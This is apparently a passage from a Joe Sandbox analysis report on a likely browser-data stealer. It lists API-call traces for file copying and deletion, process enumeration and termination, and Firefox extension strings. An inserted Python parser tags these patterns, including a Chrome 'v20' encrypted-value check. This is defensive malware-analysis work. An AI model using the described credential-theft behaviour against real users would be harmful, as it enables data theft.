                                                          • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D801
                                                        • lstrlenA.KERNEL32(00000000), ref: 0040D99F
                                                        • lstrlenA.KERNEL32(00000000), ref: 0040D9B3
                                                        • DeleteFileA.KERNEL32(00000000), ref: 0040DA32
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                        • String ID:
                                                        • API String ID: 211194620-0
                                                        • Opcode ID: 370323d9a074025678898ae999b6463eb423e9135e59877d35bb5260e336077f
                                                        • Instruction ID: 30f7704c13366a17925c5eaa4a94e79927efa66a8a92483c7baa761e0d0dbf9b
                                                        • Opcode Fuzzy Hash: 370323d9a074025678898ae999b6463eb423e9135e59877d35bb5260e336077f
                                                        • Instruction Fuzzy Hash: 848122719111089BCB04FBE1DD52EEE7339AF14314F50452EF407A6091EF386A9ACB7A
                                                        APIs
                                                          • Part of subcall function 00B3A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B3A9EF
                                                          • Part of subcall function 00B3AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B3AC2C
                                                          • Part of subcall function 00B3AC17: lstrcpy.KERNEL32(00000000), ref: 00B3AC6B
                                                          • Part of subcall function 00B3AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B3AC79
                                                          • Part of subcall function 00B3AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B3AB6C
                                                          • Part of subcall function 00B38DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,00B21660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 00B38DED
                                                          • Part of subcall function 00B3AB87: lstrcpy.KERNEL32(00000000,?), ref: 00B3ABD9
                                                          • Part of subcall function 00B3AB87: lstrcat.KERNEL32(00000000), ref: 00B3ABE9
                                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00B2DA68
                                                        • lstrlen.KERNEL32(00000000), ref: 00B2DC06
                                                        • lstrlen.KERNEL32(00000000), ref: 00B2DC1A
                                                        • DeleteFileA.KERNEL32(00000000), ref: 00B2DC99
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                        • String ID:
                                                        • API String ID: 211194620-0
                                                        • Opcode ID: 75d72e7265c2b0bcdfeb4fd8a00493fe315c357100f507a1e1d65a562648f628
                                                        • Instruction ID: 8e9cb38c2f5e81779c5c6715653a3fe6bbceb0049ff11cf406f6744ebc835a24
                                                        • Opcode Fuzzy Hash: 75d72e7265c2b0bcdfeb4fd8a00493fe315c357100f507a1e1d65a562648f628
                                                        • Instruction Fuzzy Hash: A4811372910214ABCB08FBA4DD96DEE73B9AF55301F7055ADF046620A1EF346B48CF62
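The function entries above are what an analyst reads to work out what the unpacked payload does: the GetModuleFileNameA / ShellExecuteEx / ExitProcess stub that relaunches the sample, the VirtualProtect call that rewrites section rights, the lstrcpy / lstrcat path builders, and the CopyFileA / lstrlenA / DeleteFileA routines, one of which compares three bytes against "v20" in a subcall. Because the same pairs of routines appear once in the 00400000 image and once in the 00B20000 region, it pays to read them by API set rather than by hand. The parser below is added here as an example; it is not Joe Sandbox code and not part of the report. Its sample text is constructed from four entries on this page, the tag names and the API-set rules are this author's heuristics, and the reading of "v20" (and the older "v10") as Chrome's encrypted-value prefixes is background knowledge rather than something the report states.

```python
"""Parse Joe Sandbox function-entry listings and flag API combinations.

Added example for this report, not Joe Sandbox code. SAMPLE is constructed
from four entries on this page (trimmed); the rules are this author's
heuristics, not a Joe Sandbox signature format.
"""
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed sample: four entries copied from this report, subcall lines kept.
SAMPLE = """\
APIs
• GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00B368CA
  • Part of subcall function 00B3A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B3A9EF
• ShellExecuteEx.SHELL32(0000003C), ref: 00B3698D
• ExitProcess.KERNEL32 ref: 00B369BC
Strings
Memory Dump Source
• Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
APIs
• VirtualProtect.KERNEL32(?,?,@Jn@,@Jn@), ref: 00406C9F
Strings
Memory Dump Source
• Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
APIs
• lstrcpy.KERNEL32(00000000,?), ref: 0041A972
• lstrcatA.KERNEL32(00000000), ref: 0041A982
Strings
Memory Dump Source
• Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
APIs
  • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,007F2948), ref: 00418B86
• CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040A2E1
• lstrlenA.KERNEL32(00000000,00000000), ref: 0040A3FF
  • Part of subcall function 00409E10: memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
• DeleteFileA.KERNEL32(00000000), ref: 0040A743
Memory Dump Source
• Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
"""

# One API line: optional "Part of subcall function X:" prefix, Api.MODULE,
# optional argument list, then "ref: <call-site address>".
_CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)
_SOURCE_RE = re.compile(r"^\s*•\s*Source File:\s*(?P<src>\S+),")


@dataclass
class Call:
    api: str                 # name as printed, e.g. "lstrcatA"
    module: str              # exporting module, e.g. "KERNEL32"
    args: list               # argument tokens as printed ("?" = unknown)
    ref: str                 # call-site address in the dump
    subcall: Optional[str]   # callee address if reached through a subcall

    @property
    def base(self) -> str:
        # Fold the ANSI/Unicode suffix so lstrcatA and lstrcatW compare equal.
        return re.sub(r"(?<=[a-z])[AW]$", "", self.api)


@dataclass
class Entry:
    calls: list = field(default_factory=list)
    source: str = ""

    def apis(self, direct_only: bool = False) -> set:
        return {c.base for c in self.calls if not (direct_only and c.subcall)}


def parse_entries(text: str) -> list:
    """Split the listing at each 'APIs' header and collect its call lines."""
    entries, current = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = Entry()
            entries.append(current)
            continue
        if current is None:
            continue
        m = _CALL_RE.match(line)
        if m:
            args = m["args"].split(",") if m["args"] else []
            current.calls.append(Call(m["api"], m["mod"], args, m["ref"], m["sub"]))
            continue
        s = _SOURCE_RE.match(line)
        if s:
            current.source = s["src"]
    return entries


# Heuristics (this author's): every API in the set must be a direct call.
RULES = {
    "self_relaunch": {"GetModuleFileName", "ShellExecuteEx", "ExitProcess"},
    "memory_protection_change": {"VirtualProtect"},
    "copy_read_delete": {"CopyFile", "DeleteFile"},
}
STRING_HELPERS = {"lstrcpy", "lstrcat", "lstrlen"}
# Chrome encrypted-value prefixes: v10 = key wrapped with DPAPI in Local State,
# v20 = App-Bound Encryption. Background knowledge, not stated by the report.
CHROME_PREFIXES = {"v10", "v20"}


def classify(entry: Entry) -> set:
    direct = entry.apis(direct_only=True)
    tags = {name for name, needed in RULES.items() if needed <= direct}
    if direct and direct <= STRING_HELPERS:
        tags.add("string_builder")
    for c in entry.calls:  # subcalls count here: the memcmp lives in a helper
        if c.base == "memcmp":
            for prefix in CHROME_PREFIXES & set(c.args):
                tags.add(f"chrome_{prefix}_prefix_check")
    return tags


def analyze(text: str) -> dict:
    """Map each function, keyed by its first direct call site, to its tags."""
    out = {}
    for e in parse_entries(text):
        direct = [c for c in e.calls if c.subcall is None]
        key = direct[0].ref if direct else (e.calls[0].ref if e.calls else "?")
        out[key] = classify(e)
    return out


if __name__ == "__main__":
    for ref, tags in analyze(SAMPLE).items():
        print(ref, sorted(tags))
```

Run against the full listing, the "copy_read_delete" tag marks every routine that stages a file copy, reads it and removes it again, and the "chrome_v20_prefix_check" tag singles out the one variant whose helper inspects the first three bytes of a value; the dump offsets in the keys (0040xxxx versus 00B2xxxx) show which copy of the routine each hit came from.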
                                                        APIs
                                                          • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                          • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                                          • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                                          • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                                          • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                                          • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                                          • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                                          • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                          • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                          • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                          • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                          • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                          • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                          • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                        • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00421580,00420D92), ref: 0040F54C
                                                        • lstrlenA.KERNEL32(00000000), ref: 0040F56B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                                        • String ID: ^userContextId=4294967295$moz-extension+++
                                                        • API String ID: 998311485-3310892237
                                                        • Opcode ID: c6d68fb0603da1e25a23b90469779a044771ff029b5026b29d5fc07adc8ee29f
                                                        • Instruction ID: 431312e06e4e118a9a68feb07ac8eaa96768a2afdec7ba1937323e72019175af
                                                        • Opcode Fuzzy Hash: c6d68fb0603da1e25a23b90469779a044771ff029b5026b29d5fc07adc8ee29f
                                                        • Instruction Fuzzy Hash: 19516575D11108AACB04FBB1DC52DED7338AF54314F40852EF81667191EE386B9ACBAA
                                                        APIs
                                                        • memset.MSVCRT ref: 004194EB
                                                          • Part of subcall function 00418D50: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0041951E,00000000), ref: 00418D5B
                                                          • Part of subcall function 00418D50: HeapAlloc.KERNEL32(00000000,?,?,0041951E,00000000), ref: 00418D62
                                                          • Part of subcall function 00418D50: wsprintfW.USER32 ref: 00418D78
                                                        • OpenProcess.KERNEL32(00001001,00000000,?), ref: 004195AB
                                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 004195C9
                                                        • CloseHandle.KERNEL32(00000000), ref: 004195D6
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Process$Heap$AllocCloseHandleOpenTerminatememsetwsprintf
                                                        • String ID:
                                                        • API String ID: 396451647-0
                                                        • Opcode ID: 10821a0a9b0e3e9f18d0c0a89dc9fb30756029c80415081bc58457899473f0be
                                                        • Instruction ID: faa3cbc47edc6d62fcde4c42a86d6f60d7c6cb9d9231cedff5acf80003c00c5b
                                                        • Opcode Fuzzy Hash: 10821a0a9b0e3e9f18d0c0a89dc9fb30756029c80415081bc58457899473f0be
                                                        • Instruction Fuzzy Hash: E3315C75E4020CAFDB14DFD0CD49BEDB7B9EB44300F10441AE506AA284DB78AE89CB56
                                                        APIs
                                                        • memset.MSVCRT ref: 00B39752
                                                          • Part of subcall function 00B38FB7: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00B39785,00000000), ref: 00B38FC2
                                                          • Part of subcall function 00B38FB7: RtlAllocateHeap.NTDLL(00000000), ref: 00B38FC9
                                                          • Part of subcall function 00B38FB7: wsprintfW.USER32 ref: 00B38FDF
                                                        • OpenProcess.KERNEL32(00001001,00000000,?), ref: 00B39812
                                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 00B39830
                                                        • CloseHandle.KERNEL32(00000000), ref: 00B3983D
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                                                        • String ID:
                                                        • API String ID: 3729781310-0
                                                        • Opcode ID: 0de5cb3b84569db27d3217fbf1ad12f67d16f90c4b13aa02d8c22dae1f7b6e71
                                                        • Instruction ID: 49c8cef028a0f6d77732706ed54a4987d80e52d312f958b2901f5b321075877f
                                                        • Opcode Fuzzy Hash: 0de5cb3b84569db27d3217fbf1ad12f67d16f90c4b13aa02d8c22dae1f7b6e71
                                                        • Instruction Fuzzy Hash: C0313A75E41248EFDB14DFE0CC49BEDB7B9EF45700F204499F506AA184DBB46A84CB52
                                                        APIs
                                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,004205B7), ref: 004186CA
                                                        • Process32First.KERNEL32(?,00000128), ref: 004186DE
                                                        • Process32Next.KERNEL32(?,00000128), ref: 004186F3
                                                          • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                          • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                          • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                          • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                        • CloseHandle.KERNEL32(?), ref: 00418761
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                                        • String ID:
                                                        • API String ID: 1066202413-0
                                                        • Opcode ID: 653c6250bfa2d25ce81b68ad29b9700611fbfcd40e1672ae0763ab040719d4ec
                                                        • Instruction ID: 8f5abf7c5654a811b9b3f094c7d3948ba22bca0c3321aba4e2188e2e86b1b5ea
                                                        • Opcode Fuzzy Hash: 653c6250bfa2d25ce81b68ad29b9700611fbfcd40e1672ae0763ab040719d4ec
                                                        • Instruction Fuzzy Hash: F7315E71902218ABCB24EF95DC45FEEB778EF45714F10419EF10AA21A0DF386A85CFA5
                                                        APIs
                                                          • Part of subcall function 00B3A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B3A9EF
                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,004205B7), ref: 00B38931
                                                        • Process32First.KERNEL32(?,00000128), ref: 00B38945
                                                        • Process32Next.KERNEL32(?,00000128), ref: 00B3895A
                                                          • Part of subcall function 00B3AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B3AC2C
                                                          • Part of subcall function 00B3AC17: lstrcpy.KERNEL32(00000000), ref: 00B3AC6B
                                                          • Part of subcall function 00B3AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B3AC79
                                                          • Part of subcall function 00B3AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B3AB6C
                                                        • CloseHandle.KERNEL32(?), ref: 00B389C8
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                                        • String ID:
                                                        • API String ID: 1066202413-0
                                                        • Opcode ID: 8b5492bb2172847200a0110b71b51f63116bc16bb71ede11aa5be0a2ca02365c
                                                        • Instruction ID: 72e6aa81063493dc56014cb9a3e7ada8627a4943e4a16e03174ab41fbfeb8921
                                                        • Opcode Fuzzy Hash: 8b5492bb2172847200a0110b71b51f63116bc16bb71ede11aa5be0a2ca02365c
                                                        • Instruction Fuzzy Hash: F3312F72941218ABCB24DF94DD45FEEB7B9EB45701F2041D9F10AA61A0DB346F44CF92
                                                        APIs
                                                          • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                                        • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414F7A
                                                        • lstrcatA.KERNEL32(?,00421070), ref: 00414F97
                                                        • lstrcatA.KERNEL32(?,008269D8), ref: 00414FAB
                                                        • lstrcatA.KERNEL32(?,00421074), ref: 00414FBD
                                                          • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                                                          • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                                          • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                                                          • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                                                          • Part of subcall function 00414910: FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                                                          • Part of subcall function 00414910: FindClose.KERNEL32(000000FF), ref: 00414B92
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                                        • String ID:
                                                        • API String ID: 2667927680-0
                                                        • Opcode ID: 2865ce5e19fc320e7bdf7344607122c15ce296a35d2d737d06258ac16b0412a0
                                                        • Instruction ID: b2f553c39a7574946245b6cc91baeb706efbd34a5fe7bafabb54328a91102e52
                                                        • Opcode Fuzzy Hash: 2865ce5e19fc320e7bdf7344607122c15ce296a35d2d737d06258ac16b0412a0
                                                        • Instruction Fuzzy Hash: FA213DBAA402047BC714FBF0EC46FED333DAB55300F40455DB649920C1EE7896C88B96
                                                        APIs
                                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E28,00000000,?), ref: 0041882F
                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,00420E28,00000000,?), ref: 00418836
                                                        • wsprintfA.USER32 ref: 00418850
                                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Heap$AllocProcesslstrcpywsprintf
                                                        • String ID: %dx%d
                                                        • API String ID: 2716131235-2206825331
                                                        • Opcode ID: 124e357ede7c9a4ec2e38b5c0962ba134007384ad5c1c3eeb759acb43c381339
                                                        • Instruction ID: e741bf7ca2fc1d65a497d39fe48fe123552d5275a0b8a8093fc8d321cf3eb0b5
                                                        • Opcode Fuzzy Hash: 124e357ede7c9a4ec2e38b5c0962ba134007384ad5c1c3eeb759acb43c381339
                                                        • Instruction Fuzzy Hash: 48217FB5A80208BFDB00DFD4DD49FAEBBB9FB49B00F104119F605A7280C779A900CBA5
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ExitProcessstrtok_s
                                                        • String ID:
                                                        • API String ID: 3407564107-0
                                                        • Opcode ID: 23663e118dc1d9675e857bc575fa0cf4eec126624f33d54e6aec62cd9d365414
                                                        • Instruction ID: ddeacf7cf3dd85e7642bd0dadaed5d3800e0014b43535b69b030ac65a0cd67f3
                                                        • Opcode Fuzzy Hash: 23663e118dc1d9675e857bc575fa0cf4eec126624f33d54e6aec62cd9d365414
                                                        • Instruction Fuzzy Hash: 76116DB4900209EFCB04EFE4D948AEDBBB9FF04305F6084A9E80567290E7306B04CF55
                                                        APIs
                                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E00,00000000,?), ref: 004179B0
                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,00420E00,00000000,?), ref: 004179B7
                                                        • GetLocalTime.KERNEL32(?,?,?,?,?,00420E00,00000000,?), ref: 004179C4
                                                        • wsprintfA.USER32 ref: 004179F3
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Heap$AllocLocalProcessTimewsprintf
                                                        • String ID:
                                                        • API String ID: 1243822799-0
                                                        • Opcode ID: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                                                        • Instruction ID: 87643aaeb61937c0b28f46190d625ee9f9fa63f6271d25fb840393839df263de
                                                        • Opcode Fuzzy Hash: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                                                        • Instruction Fuzzy Hash: 6D1139B2944118ABCB14DFC9DD45BBEB7F9FB4DB11F10421AF605A2280E3395940CBB5
                                                        APIs
                                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E00,00000000,?), ref: 00B37C17
                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00B37C1E
                                                        • GetLocalTime.KERNEL32(?,?,?,?,?,00420E00,00000000,?), ref: 00B37C2B
                                                        • wsprintfA.USER32 ref: 00B37C5A
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Heap$AllocateLocalProcessTimewsprintf
                                                        • String ID:
                                                        • API String ID: 377395780-0
                                                        • Opcode ID: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                                                        • Instruction ID: 6de023c0983d82bc89e0bf31e1c2478f82f00b4ed65846893b13fd5e9ebf5e99
                                                        • Opcode Fuzzy Hash: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                                                        • Instruction Fuzzy Hash: FC1127B2944118BBCB14DFC9DD45BBEB7F9FB4DB11F10425AF605A2280D6395940CBB1
                                                        APIs
                                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0064A248,00000000,?,00420E10,00000000,?,00000000,00000000), ref: 00B37CCA
                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00B37CD1
                                                        • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0064A248,00000000,?,00420E10,00000000,?,00000000,00000000,?), ref: 00B37CE4
                                                        • wsprintfA.USER32 ref: 00B37D1E
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                                        • String ID:
                                                        • API String ID: 3317088062-0
                                                        • Opcode ID: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                                                        • Instruction ID: 6456628bfa162cc85db5b227d3f69ad0b038937afeb35b0c0482e701a53efbbb
